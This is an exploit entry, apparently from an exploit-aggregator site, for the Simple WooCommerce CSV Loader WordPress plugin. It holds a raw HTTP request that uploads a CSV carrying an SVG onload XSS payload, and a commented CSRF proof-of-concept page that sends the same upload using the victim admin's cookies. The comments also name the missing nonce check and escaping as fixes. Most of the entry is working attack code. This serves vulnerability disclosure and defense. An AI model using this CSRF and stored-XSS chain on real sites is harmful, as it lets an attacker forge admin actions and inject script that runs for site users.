## https://sploitus.com/exploit?id=WPEX-ID:13BB796F-7A17-47C9-A46F-A1D6CA4B6B91
POST /wp-admin/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookies: [logged in admin]
Connection: close

------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="post_type"

product
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="separator"

,
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="titeled"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="hierarchical_multicat"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="upload_file"; filename="example_code.csv"
Content-Type: text/csv

Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
Strawberry Short Cake,Delicious Strawberry Cake 18"",80,Bakery,001,Dessert,<svg/onload=alert(/XSS/)>


<!--
  Proof-of-concept page for testing the Simple WooCommerce CSV Loader admin
  import endpoint against cross-site request forgery (CSRF). Clicking the
  button sends a multipart POST, with the browser's cookies attached, to the
  plugin's CSVLoader.php admin page on the placeholder host example.com.

  What a defender should read from it:
  * None of the form fields sent below is an anti-CSRF token.
    NOTE(review): presumably the endpoint accepts the upload without verifying
    a WordPress nonce; confirm against the plugin source. The server-side fix
    is a nonce check (check_admin_referer / wp_verify_nonce) plus a capability
    check before the file is processed.
  * The uploaded CSV carries HTML markup in its Thumbnail column.
    NOTE(review): presumably the plugin echoes imported values without
    escaping; output should go through esc_html / esc_attr, and imported
    fields should be sanitized on the way in.
-->
<html>
  <body>
    <script>
      // Builds the import request by hand and sends it with XMLHttpRequest.
      // Takes no arguments and returns nothing; the response is never read.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // Target is the plugin's admin page; example.com is a placeholder host.
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        // The body is assembled manually, so the boundary is declared here and
        // must match the delimiter lines used in `body` below.
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------292171499811633611081131645549");
        // Ask the browser to attach the target site's cookies to this request.
        // This is why the request is handled as coming from the signed-in
        // admin when the endpoint has no token check of its own.
        xhr.withCredentials = true;
        // Multipart parts, in order: post_type, taxonomy, separator, titeled,
        // hierarchical_multicat, upload_file (the CSV) and wc_load_csv.
        // There is no nonce or other per-session token among them.
        var body = "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"post_type\"\r\n" +
          "\r\n" +
          "product\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"taxonomy\"\r\n" +
          "\r\n" +
          "product_type\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"separator\"\r\n" +
          "\r\n" +
          ",\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"titeled\"\r\n" +
          "\r\n" +
          "on\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"hierarchical_multicat\"\r\n" +
          "\r\n" +
          "on\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"upload_file\"; filename=\"a.csv\"\r\n" +
          "Content-Type: text/csv\r\n" +
          "\r\n" +
          // CSV payload: one header row and one data row, each ended with a
          // bare \n (the multipart framing around it uses \r\n).
          "Name,Content,Price,Gender,sku,Multi_cat,Thumbnail\n" +
          // The Thumbnail column holds SVG markup with an onload handler that
          // only calls alert(); \x3c and \x3e are JS escapes for < and >.
          // It serves as a visible marker that the value was rendered as HTML.
          "Strawberry Short Cake,Delicious Strawberry Cake 18\"\",80,Bakery,001,Dessert,\x3csvg/onload=alert(/XSS/)\x3e\n" +
          "\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"wc_load_csv\"\r\n" +
          "\r\n" +
          "Load\r\n" +
          "-----------------------------292171499811633611081131645549--\r\n";
        // Copy the string into a byte array one char code per byte, then send
        // it as a Blob so the body goes out exactly as written above.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <!-- The button is type="button", so the form itself is never submitted;
         the click handler alone triggers the request. -->
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>